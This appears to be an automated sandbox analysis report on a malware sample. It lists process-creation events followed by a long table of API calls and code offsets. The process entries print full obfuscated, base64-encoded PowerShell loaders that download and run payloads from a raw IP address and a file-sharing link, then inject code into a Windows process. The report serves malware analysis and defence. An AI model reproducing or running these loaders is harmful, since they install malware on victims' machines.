iNVOkE-eXPREsSioN($(InvOKE-EXpReSSiON('[syStEM.TeXT.eNCODiNG]'+[CHaR]0X3A+[chAr]0x3A+'utf8.geTstrINg([SYSTem.CoNverT]'+[CHar]0X3A+[ChAr]0x3A+'fRoMbASE64sTriNG('+[ChAr]34+'JFFwa0tZNkUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFEZC10WXBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVtQmVSZGVmaU5JdGlvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVyTG1vbi5kTEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSlF6LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgemMsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBUV2lKbWZpekcsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcE1qdXRlSyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGhHSWR3ZngpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiYUFpTXpoIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUVTcEFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSG1QTWMgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRRcGtLWTZFOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTcyLjI0NS4xMjMuMTIvMzYxL3NlZW1lYmVzdHRoaW5nc2VudGlyZWxpZmVnaXZlbmJhY2t3aXRoZ29vZC50SUYiLCIkZW52OkFQUERBVEFcc2VlbWViZXN0dGhpbmdzZW50aXJlbGlmZWdpdmVuYmFjLnZiUyIsMCwwKTtTVEFydC1zTEVFcCgzKTtJaSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFTlY6QVBQREFUQVxzZWVtZWJlc3R0aGluZ3NlbnRpcmVsaWZlZ2l2ZW5iYWMudmJTIg=='+[chaR]34+'))')))"
                  Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $alastrar = 'JGVzdHJlbGVqYXIgPSAnaHR0cHM6Ly8xMDE2LmZpbGVtYWlsLmNvbS9hcGkvZmlsZS9nZXQ/ZmlsZWtleT1IVFVHX0V5cnVEUjBPQVpIMEhISnllcFVyWFN2Rl9pNmo4YndlVGVXQkN1MTl4Y2JqUU41VGtzYTRPRzBNcWNjcVdOTGxnJnBrX3ZpZD1lMDEwOTYzOGM5YmZiOTU3MTczMjc5NDM1NmExZmY2YyAnOyRhbWJpZ3VpZGFkZSA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7JGVudHJhZGFuaGEgPSAkYW1iaWd1aWRhZGUuRG93bmxvYWREYXRhKCRlc3RyZWxlamFyKTskYm9ybmVjbyA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCRlbnRyYWRhbmhhKTskbGlxdWlkaWZpY2FyID0gJzw8QkFTRTY0X1NUQVJUPj4nOyRwaW50b3JhID0gJzw8QkFTRTY0X0VORD4+JzskY2hvdXZpciA9ICRib3JuZWNvLkluZGV4T2YoJGxpcXVpZGlmaWNhcik7JGltbWVyZ2lyID0gJGJvcm5lY28uSW5kZXhPZigkcGludG9yYSk7JGNob3V2aXIgLWdlIDAgLWFuZCAkaW1tZXJnaXIgLWd0ICRjaG91dmlyOyRjaG91dmlyICs9ICRsaXF1aWRpZmljYXIuTGVuZ3RoOyRmcnV0aWZpY2FyID0gJGltbWVyZ2lyIC0gJGNob3V2aXI7JGJ1c3NvbGNvID0gJGJvcm5lY28uU3Vic3RyaW5nKCRjaG91dmlyLCAkZnJ1dGlmaWNhcik7JHF1aW5pY2EgPSAtam9pbiAoJGJ1c3NvbGNvLlRvQ2hhckFycmF5KCkgfCBGb3JFYWNoLU9iamVjdCB7ICRfIH0pWy0xLi4tKCRidXNzb2xjby5MZW5ndGgpXTskYmVpcmFtZSA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJHF1aW5pY2EpOyRzYWlkb3IgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRiZWlyYW1lKTskZW5nb3JkdXJhciA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoJ1ZBSScpOyRlbmdvcmR1cmFyLkludm9rZSgkbnVsbCwgQCgndHh0LkFSRU5MRVQvMTYzLzIxLjMyMS41NDIuMjcxLy86cHR0aCcsICckZGFkYW5lJywgJyRkYWRhbmUnLCAnJGRhZGFuZScsICdhc3BuZXRfY29tcGlsZXInLCAnJGRhZGFuZScsICckZGFkYW5lJywnJGRhZGFuZScsJyRkYWRhbmUnLCckZGFkYW5lJywnJGRhZGFuZScsJyRkYWRhbmUnLCcxJywnJGRhZGFuZScpKTs=';$morfose = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($alastrar));Invoke-Expression $morfose
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe pOwErSHelL.exE -ex BYpASS -NOp -w 1 -C dEVICeCreDENtialDePLOYMENT ; iNVOkE-eXPREsSioN($(InvOKE-EXpReSSiON('[syStEM.TeXT.eNCODiNG]'+[CHaR]0X3A+[chAr]0x3A+'utf8.geTstrINg([SYSTem.CoNverT]'+[CHar]0X3A+[ChAr]0x3A+'fRoMbASE64sTriNG('+[ChAr]34+'JFFwa0tZNkUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFEZC10WXBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVtQmVSZGVmaU5JdGlvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVyTG1vbi5kTEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSlF6LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgemMsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBUV2lKbWZpekcsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcE1qdXRlSyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGhHSWR3ZngpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiYUFpTXpoIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUVTcEFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSG1QTWMgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRRcGtLWTZFOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTcyLjI0NS4xMjMuMTIvMzYxL3NlZW1lYmVzdHRoaW5nc2VudGlyZWxpZmVnaXZlbmJhY2t3aXRoZ29vZC50SUYiLCIkZW52OkFQUERBVEFcc2VlbWViZXN0dGhpbmdzZW50aXJlbGlmZWdpdmVuYmFjLnZiUyIsMCwwKTtTVEFydC1zTEVFcCgzKTtJaSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFTlY6QVBQREFUQVxzZWVtZWJlc3R0aGluZ3NlbnRpcmVsaWZlZ2l2ZW5iYWMudmJTIg=='+[chaR]34+'))')))"Jump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $alastrar = 'JGVzdHJlbGVqYXIgPSAnaHR0cHM6Ly8xMDE2LmZpbGVtYWlsLmNvbS9hcGkvZmlsZS9nZXQ/ZmlsZWtleT1IVFVHX0V5cnVEUjBPQVpIMEhISnllcFVyWFN2Rl9pNmo4YndlVGVXQkN1MTl4Y2JqUU41VGtzYTRPRzBNcWNjcVdOTGxnJnBrX3ZpZD1lMDEwOTYzOGM5YmZiOTU3MTczMjc5NDM1NmExZmY2YyAnOyRhbWJpZ3VpZGFkZSA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7JGVudHJhZGFuaGEgPSAkYW1iaWd1aWRhZGUuRG93bmxvYWREYXRhKCRlc3RyZWxlamFyKTskYm9ybmVjbyA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCRlbnRyYWRhbmhhKTskbGlxdWlkaWZpY2FyID0gJzw8QkFTRTY0X1NUQVJUPj4nOyRwaW50b3JhID0gJzw8QkFTRTY0X0VORD4+JzskY2hvdXZpciA9ICRib3JuZWNvLkluZGV4T2YoJGxpcXVpZGlmaWNhcik7JGltbWVyZ2lyID0gJGJvcm5lY28uSW5kZXhPZigkcGludG9yYSk7JGNob3V2aXIgLWdlIDAgLWFuZCAkaW1tZXJnaXIgLWd0ICRjaG91dmlyOyRjaG91dmlyICs9ICRsaXF1aWRpZmljYXIuTGVuZ3RoOyRmcnV0aWZpY2FyID0gJGltbWVyZ2lyIC0gJGNob3V2aXI7JGJ1c3NvbGNvID0gJGJvcm5lY28uU3Vic3RyaW5nKCRjaG91dmlyLCAkZnJ1dGlmaWNhcik7JHF1aW5pY2EgPSAtam9pbiAoJGJ1c3NvbGNvLlRvQ2hhckFycmF5KCkgfCBGb3JFYWNoLU9iamVjdCB7ICRfIH0pWy0xLi4tKCRidXNzb2xjby5MZW5ndGgpXTskYmVpcmFtZSA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJHF1aW5pY2EpOyRzYWlkb3IgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRiZWlyYW1lKTskZW5nb3JkdXJhciA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoJ1ZBSScpOyRlbmdvcmR1cmFyLkludm9rZSgkbnVsbCwgQCgndHh0LkFSRU5MRVQvMTYzLzIxLjMyMS41NDIuMjcxLy86cHR0aCcsICckZGFkYW5lJywgJyRkYWRhbmUnLCAnJGRhZGFuZScsICdhc3BuZXRfY29tcGlsZXInLCAnJGRhZGFuZScsICckZGFkYW5lJywnJGRhZGFuZScsJyRkYWRhbmUnLCckZGFkYW5lJywnJGRhZGFuZScsJyRkYWRhbmUnLCcxJywnJGRhZGFuZScpKTs=';$morfose = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($alastrar));Invoke-Expression $morfoseJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_0042BDA3 NtClose,12_2_0042BDA3
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A22B60 NtClose,LdrInitializeThunk,12_2_01A22B60
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A22DF0 NtQuerySystemInformation,LdrInitializeThunk,12_2_01A22DF0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A22C70 NtFreeVirtualMemory,LdrInitializeThunk,12_2_01A22C70
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A235C0 NtCreateMutant,LdrInitializeThunk,12_2_01A235C0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A24340 NtSetContextThread,12_2_01A24340
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A24650 NtSuspendThread,12_2_01A24650
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A22BA0 NtEnumerateValueKey,12_2_01A22BA0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A22B80 NtQueryInformationFile,12_2_01A22B80
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A22BE0 NtQueryValueKey,12_2_01A22BE0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A22BF0 NtAllocateVirtualMemory,12_2_01A22BF0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A22AB0 NtWaitForSingleObject,12_2_01A22AB0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A22AF0 NtWriteFile,12_2_01A22AF0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A22AD0 NtReadFile,12_2_01A22AD0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A22DB0 NtEnumerateKey,12_2_01A22DB0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A22DD0 NtDelayExecution,12_2_01A22DD0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A22D30 NtUnmapViewOfSection,12_2_01A22D30
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A22D00 NtSetInformationFile,12_2_01A22D00
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A22D10 NtMapViewOfSection,12_2_01A22D10
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A22CA0 NtQueryInformationToken,12_2_01A22CA0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A22CF0 NtOpenProcess,12_2_01A22CF0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A22CC0 NtQueryVirtualMemory,12_2_01A22CC0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A22C00 NtQueryInformationProcess,12_2_01A22C00
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A22C60 NtCreateKey,12_2_01A22C60
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A22FA0 NtQuerySection,12_2_01A22FA0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A22FB0 NtResumeThread,12_2_01A22FB0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A22F90 NtProtectVirtualMemory,12_2_01A22F90
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A22FE0 NtCreateFile,12_2_01A22FE0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A22F30 NtCreateSection,12_2_01A22F30
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A22F60 NtCreateProcessEx,12_2_01A22F60
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A22EA0 NtAdjustPrivilegesToken,12_2_01A22EA0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A22E80 NtReadVirtualMemory,12_2_01A22E80
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A22EE0 NtQueueApcThread,12_2_01A22EE0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A22E30 NtWriteVirtualMemory,12_2_01A22E30
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A23090 NtSetValueKey,12_2_01A23090
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A23010 NtOpenDirectoryObject,12_2_01A23010
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A239B0 NtGetContextThread,12_2_01A239B0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A23D10 NtOpenProcessToken,12_2_01A23D10
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A23D70 NtOpenThread,12_2_01A23D70
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_04C386407_2_04C38640
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_04C387B07_2_04C387B0
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_04C3565D7_2_04C3565D
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_04C37FE47_2_04C37FE4
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_04C34A777_2_04C34A77
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_0040100012_2_00401000
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_0040F80312_2_0040F803
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_004160B312_2_004160B3
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_0040126012_2_00401260
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_0040FA2312_2_0040FA23
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_00402ADD12_2_00402ADD
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_00402AE012_2_00402AE0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_0040DAA312_2_0040DAA3
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_0040234012_2_00402340
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_0042E33312_2_0042E333
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_0040233412_2_00402334
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_00402E7012_2_00402E70
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_0040F7FA12_2_0040F7FA
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01AB01AA12_2_01AB01AA
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01AA81CC12_2_01AA81CC
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_019E010012_2_019E0100
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A8A11812_2_01A8A118
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A7815812_2_01A78158
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A8200012_2_01A82000
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01AB03E612_2_01AB03E6
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_019FE3F012_2_019FE3F0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01AAA35212_2_01AAA352
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A702C012_2_01A702C0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A9027412_2_01A90274
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01AB059112_2_01AB0591
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_019F053512_2_019F0535
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A9E4F612_2_01A9E4F6
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01AA244612_2_01AA2446
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_019EC7C012_2_019EC7C0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_019F077012_2_019F0770
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A1475012_2_01A14750
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A0C6E012_2_01A0C6E0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01ABA9A612_2_01ABA9A6
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_019F29A012_2_019F29A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A0696212_2_01A06962
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_019D68B812_2_019D68B8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A1E8F012_2_01A1E8F0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_019F284012_2_019F2840
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_019FA84012_2_019FA840
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01AA6BD712_2_01AA6BD7
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01AAAB4012_2_01AAAB40
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_019EEA8012_2_019EEA80
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A08DBF12_2_01A08DBF
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_019EADE012_2_019EADE0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_019FAD0012_2_019FAD00
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A8CD1F12_2_01A8CD1F
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A90CB512_2_01A90CB5
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_019E0CF212_2_019E0CF2
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_019F0C0012_2_019F0C00
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A6EFA012_2_01A6EFA0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_019E2FC812_2_019E2FC8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A32F2812_2_01A32F28
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A10F3012_2_01A10F30
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A64F4012_2_01A64F40
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A02E9012_2_01A02E90
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01AACE9312_2_01AACE93
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01AAEEDB12_2_01AAEEDB
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01AAEE2612_2_01AAEE26
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_019F0E5912_2_019F0E59
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_019FB1B012_2_019FB1B0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01ABB16B12_2_01ABB16B
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A2516C12_2_01A2516C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_019DF17212_2_019DF172
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01AA70E912_2_01AA70E9
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01AAF0E012_2_01AAF0E0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_019F70C012_2_019F70C0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A9F0CC12_2_01A9F0CC
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A3739A12_2_01A3739A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01AA132D12_2_01AA132D
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_019DD34C12_2_019DD34C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_019F52A012_2_019F52A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A912ED12_2_01A912ED
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A0B2C012_2_01A0B2C0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A8D5B012_2_01A8D5B0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01AA757112_2_01AA7571
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01AAF43F12_2_01AAF43F
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_019E146012_2_019E1460
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01AAF7B012_2_01AAF7B0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01AA16CC12_2_01AA16CC
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A8591012_2_01A85910
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_019F995012_2_019F9950
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A0B95012_2_01A0B950
